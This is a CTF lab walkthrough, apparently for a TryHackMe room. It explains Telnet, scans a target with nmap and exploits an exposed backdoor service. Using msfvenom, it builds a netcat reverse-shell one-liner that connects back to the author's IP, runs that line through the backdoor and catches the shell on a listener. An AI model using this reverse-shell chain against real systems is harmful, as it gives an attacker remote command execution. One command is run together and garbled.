If this service is running, it is a bright red flag that should be looked into immediately. Telnet does not require credentials. TryHackMe has a paid room that teaches Telnet.
Telnet is an application protocol which allows the use of a telnet client to connect and execute commands on a remote machine that’s hosting a telnet server.
The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.
Telnet sends all messages in clear text and has no specific security mechanisms. Telnet has been replaced by SSH in most production environments.
The user connects to the server by using the Telnet protocol. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. The following command is used to connect to a telnet service:
telnet [ip] [port]
Begin by running reconnaissance on the the target macine:
sudo nmap -A -O -p- 10.10.147.86
PORT STATE SERVICE VERSION
8012/tcp open unknown
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ SKIDY’S BACKDOOR. Type .HELP to view commands
Why SKIDY, why???!!! Connect to it
telnet 10.10.200.201 8012
Trying 10.10.200.201... Connected to 10.10.200.201. Escape character is '^]'. SKIDY'S BACKDOOR. Type .HELP to view commands ls -- nothing.... .HELP .HELP: View commands .RUN : Execute commands .EXIT: Exit .RUN whoami -- nothing.... .RUN ls -- nothing.... .RUN ping 10.13.12.54 -c 1 # That 10.13.12.54 is me on tun0, the IP from the VPN running.....
We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.
export lport=4444msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R
Here is a more generic example to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for you.
msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format
msfvenom -p cmd/unix/reverse_netcat lhost=10.13.12.54 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 93 bytes mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx
Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
nc -lvp 4444
That is setting up netcat to listen
Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Cool, now go run that last line printed out back in the skidy’s terminal
.RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx
Then it poops in the other terminal!!!!!!
nc -lvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 ls Ncat: Connection from 10.10.200.201. Ncat: Connection from 10.10.200.201:55650. flag.txt